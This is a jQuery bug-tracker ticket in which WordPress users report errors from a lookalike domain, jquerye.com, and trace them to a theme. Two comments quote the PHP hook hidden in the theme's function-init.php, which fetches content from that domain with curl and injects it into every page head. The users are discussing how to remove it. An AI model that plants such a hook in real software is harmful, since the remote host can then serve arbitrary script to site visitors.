Side navigation
#13299 closed bug (duplicate)
Opened January 22, 2013 01:00PM UTC
Closed January 22, 2013 02:03PM UTC
Last modified April 06, 2013 07:35AM UTC
recieving error about jquery suddenly
Reported by: | hussy.plus@gmail.com | Owned by: | |
---|---|---|---|
Priority: | undecided | Milestone: | None |
Component: | unfiled | Version: | git |
Keywords: | Cc: | ||
Blocked by: | Blocking: |
Description
HEllo can you resolve this please?
404 Not Found
The server can not find the requested page:
www.jquerye.com/jquery-1.6.3.min.js (port 80)
Please forward this error screen to www.jquerye.com's WebMaster.
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.jquerye.com Port 80
It seems it has nothing to do with my site. thanks
Attachments (0)
Change History (17)
Changed January 22, 2013 02:03PM UTC by comment:1
resolution: | → duplicate |
---|---|
status: | new → closed |
Changed January 22, 2013 03:52PM UTC by comment:2
Hellow, I'm having the same problem, and i can't find it in the website, thanks for the help
Changed January 22, 2013 04:14PM UTC by comment:3
Replying to [comment:2 mario]:
Hellow, I'm having the same problem, and i can't find it in the website, thanks for the help
Hello, i got my problem solved, it was due to wrong coding of template. hussy.plus@gmail.com contact me here i will get you solved with it.
Changed January 22, 2013 04:51PM UTC by comment:4
Replying to [comment:3 anonymous]:
Replying to [comment:2 mario]: > Hellow, I'm having the same problem, and i can't find it in the website, thanks for the help Hello, i got my problem solved, it was due to wrong coding of template. hussy.plus@gmail.com contact me here i will get you solved with it.
Sent you a mail.
Changed January 22, 2013 05:09PM UTC by comment:5
I have the same problem....what's happening?
Changed January 22, 2013 05:42PM UTC by comment:6
What's happening is you're using a fake site. Perhaps you're all victims of a security vulnerability, but this problem is not related to any jQuery servers and there is nothing we can do about this. You need to fix your code to point to a legitimate source, such as the jQuery, Google, or Microsoft CDNs (or host the file yourself).
Changed January 22, 2013 06:29PM UTC by comment:7
Can you please tell me ! How to figure this out.
Any help wud be greatfull
Changed January 22, 2013 06:39PM UTC by comment:8
NO actually we all are using same theme what i have discovered so far. BTW go to your theme folder and find a folder includes. Find function-init.php and remove that code if it looks like:
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
Changed January 23, 2013 03:00AM UTC by comment:9
This actually worked...I just did it and it fix the problem. Thanks man.
Changed January 23, 2013 04:00AM UTC by comment:10
im using wordpress..how can i remove it? any idea? should i update my wordpress version?
Changed January 23, 2013 04:03AM UTC by comment:11
actually, removing it, causes other problems...back to trying to figure it out.
Changed January 23, 2013 07:13AM UTC by comment:12
Worked for me ! I can help those find that line in the theme !
Mention your theme name !
Changed January 23, 2013 07:32AM UTC by comment:13
LOL My pleasure guys, iyannanaman It doesn't matter what WP version are you using. Its the theme that is culprit. Something is fishy with it. You can try finding those lines and remove it then tell us.
Changed January 23, 2013 07:42AM UTC by comment:14
For us it is having no problem at all! For those who are unsuccessful with it , try deactivating their plug ins one by one. Sometimes a plug maybe calling a function that doesn't suit your theme.
Changed January 25, 2013 01:26PM UTC by comment:15
Replying to [comment:12 yeshu.aryan@…]:
Worked for me ! I can help those find that line in the theme ! Mention your theme name !
My Theme is zantam's Progessio
Changed March 28, 2013 06:41PM UTC by comment:16
I just want to know, do we remove the entire code? or just a pottion of this code ?
?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = " http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
Changed April 06, 2013 07:35AM UTC by comment:17
Thanks alot....... its working fine.
Duplicate of #13297.